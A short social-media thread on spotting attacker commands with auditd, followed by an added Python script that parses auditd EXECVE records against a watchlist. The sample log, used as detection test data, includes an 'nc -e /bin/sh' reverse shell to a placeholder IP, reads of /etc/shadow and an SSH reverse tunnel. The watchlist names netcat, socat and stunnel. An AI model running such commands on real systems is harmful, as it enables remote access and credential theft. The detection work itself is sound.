A client just asked for info on *nix commands that are most often run by attackers vs. legitimate users that we can find with auditd. Some things I thought of:
ssh tunneling params
stunnel
nc
cat/head/tail/more/less <critical config files>
What else? Any cheat sheets out there?
Replying to @MalwareJake
Interesting question: will auditd log the leading spaces if the attacker tries to put a space at the beginning of a command line to avoid history?

Sep 11, 2020 · 11:19 PM UTC

Replying to @hal_pomeranz
Ooh, I don't know.
No. You’d have to instrument the leader in the shell to get that. But an instrumented shell isn’t a bad idea anyhow.
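Two points in this thread can be shown on actual auditd records: which of the commands named in the first post an execve(2) watch surfaces, and why the leading-space trick never reaches auditd (the interactive shell consumes the whitespace before the syscall, so a0 never carries it; only the shell's own history is affected). The following is an added example, not code from the thread or from the auditd project. It assumes the usual execve rule (`auditctl -a always,exit -F arch=b64 -S execve -F auid>=1000 -F auid!=unset -k exec`) is loaded; the log lines and the watchlist are constructed for illustration. It also decodes the bare-hex form auditd uses for arguments containing spaces, which is how a `bash -c '...'` string shows up.

```python
# Added example, not code from the thread: parse auditd EXECVE records and flag
# the command patterns the first post lists. The sample log and the watchlist
# are constructed; the audit rule assumed is the standard execve watch.
import posixpath
import re
import shlex
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample. No a0 carries a leading space: the shell consumes it before
# execve(2), so HISTCONTROL=ignorespace hides a command from .bash_history but
# not from auditd. The bash -c string in event 4523 contains a space, which
# auditd writes as bare hex instead of a quoted string.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1599866360.101:4521): arch=c000003e syscall=59 success=yes exit=0 ppid=1831 pid=1903 auid=1000 uid=1000 gid=1000 tty=pts0 comm="cat" exe="/usr/bin/cat" key="exec"
type=EXECVE msg=audit(1599866360.101:4521): argc=2 a0="cat" a1="/etc/shadow"
type=SYSCALL msg=audit(1599866360.205:4522): arch=c000003e syscall=59 success=yes exit=0 ppid=1831 pid=1910 auid=1000 uid=1000 gid=1000 tty=pts0 comm="ssh" exe="/usr/bin/ssh" key="exec"
type=EXECVE msg=audit(1599866360.205:4522): argc=5 a0="ssh" a1="-N" a2="-R" a3="2222:localhost:22" a4="user@203.0.113.5"
type=SYSCALL msg=audit(1599866360.330:4523): arch=c000003e syscall=59 success=yes exit=0 ppid=1831 pid=1915 auid=1000 uid=1000 gid=1000 tty=pts0 comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1599866360.330:4523): argc=3 a0="bash" a1="-c" a2=636174202F6574632F736861646F77
type=SYSCALL msg=audit(1599866360.410:4524): arch=c000003e syscall=59 success=yes exit=0 ppid=1831 pid=1920 auid=1000 uid=1000 gid=1000 tty=pts0 comm="nc" exe="/usr/bin/nc" key="exec"
type=EXECVE msg=audit(1599866360.410:4524): argc=5 a0="nc" a1="-e" a2="/bin/sh" a3="203.0.113.5" a4="4444"
type=SYSCALL msg=audit(1599866360.512:4525): arch=c000003e syscall=59 success=yes exit=0 ppid=1831 pid=1925 auid=1000 uid=1000 gid=1000 tty=pts0 comm="ls" exe="/usr/bin/ls" key="exec"
type=EXECVE msg=audit(1599866360.512:4525): argc=2 a0="ls" a1="-la"
"""

EVENT_ID_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Illustrative watchlist built from the commands named in the thread.
RELAY_TOOLS = ("stunnel", "stunnel4", "nc", "ncat", "netcat", "socat")
SSH_FORWARD_FLAGS = ("-L", "-R", "-D", "-w")   # local / remote / dynamic / tun forwarding
PAGERS = ("cat", "head", "tail", "more", "less")
SENSITIVE_FILES = ("/etc/shadow", "/etc/sudoers", "/etc/ssh/sshd_config", "/.ssh/authorized_keys")
SHELLS = ("sh", "bash", "dash", "zsh")


@dataclass
class ExecEvent:
    event_id: str
    fields: Dict[str, str] = field(default_factory=dict)  # from the SYSCALL record
    argv: List[str] = field(default_factory=list)         # from the EXECVE record


def decode_arg(raw: str) -> str:
    """Unquote an aN value. A bare value is auditd's hex encoding of a string
    containing a space, quote or non-printable byte (or the literal (null))."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    try:
        return bytes.fromhex(raw).decode("utf-8", "replace")
    except ValueError:
        return raw


def parse_audit_log(text: str) -> List[ExecEvent]:
    """Join the SYSCALL and EXECVE records that share one msg=audit(time:serial) id."""
    events: Dict[str, ExecEvent] = {}
    for line in text.splitlines():
        m = EVENT_ID_RE.search(line)
        if not m:
            continue
        ev = events.setdefault(f"{m.group(1)}:{m.group(2)}", ExecEvent(f"{m.group(1)}:{m.group(2)}"))
        fields = dict(FIELD_RE.findall(line))
        if fields.get("type") == "SYSCALL":
            ev.fields.update((k, v.strip('"')) for k, v in fields.items() if k not in ("type", "msg"))
        elif fields.get("type") == "EXECVE":
            args = {int(k[1:]): decode_arg(v) for k, v in fields.items() if k[0] == "a" and k[1:].isdigit()}
            ev.argv = [args[i] for i in sorted(args)]
    return [ev for ev in events.values() if ev.argv]


def classify(argv: List[str]) -> List[str]:
    """Return the watchlist hits for one argv; empty when nothing is notable."""
    if not argv:
        return []
    cmd = posixpath.basename(argv[0])
    hits: List[str] = []
    if cmd in RELAY_TOOLS:
        hits.append(f"network relay tool: {cmd}")
    if cmd == "ssh" and any(a.startswith(SSH_FORWARD_FLAGS) for a in argv[1:]):
        hits.append("ssh port forwarding")
    if cmd in PAGERS:
        hits += [f"read of sensitive file: {a}" for a in argv[1:] if a.endswith(SENSITIVE_FILES)]
    # `bash -c '...'` folds the real command into one argument; it is still fully
    # visible to auditd, so split it and classify the inner argv as well.
    if cmd in SHELLS and "-c" in argv[1:]:
        i = argv.index("-c")
        if i + 1 < len(argv):
            try:
                inner = shlex.split(argv[i + 1])
            except ValueError:
                inner = argv[i + 1].split()
            hits += [f"via {cmd} -c: {h}" for h in classify(inner)]
    return hits


def scan(text: str) -> List[Tuple[str, str, List[str], List[str]]]:
    """(event id, auid, argv, hits) for every execve that matched a rule."""
    out = []
    for ev in parse_audit_log(text):
        hits = classify(ev.argv)
        if hits:
            out.append((ev.event_id, ev.fields.get("auid", "?"), ev.argv, hits))
    return out


if __name__ == "__main__":
    for event_id, auid, argv, hits in scan(SAMPLE_AUDIT_LOG):
        print(f"{event_id} auid={auid} {shlex.join(argv)}")
        for h in hits:
            print(f"    {h}")
```

Run against the sample, four of the five execs are reported and `ls -la` is not. The `bash -c` case is the one worth noting: the inner `cat /etc/shadow` arrives hex-encoded because of the embedded space, and a detection that only looks at quoted `aN` values misses it. Matching on argv this way says nothing about how the line was typed, which is the point of the thread: a space typed before the command is gone by the time execve(2) runs, so catching that requires logging inside the shell itself, not in auditd.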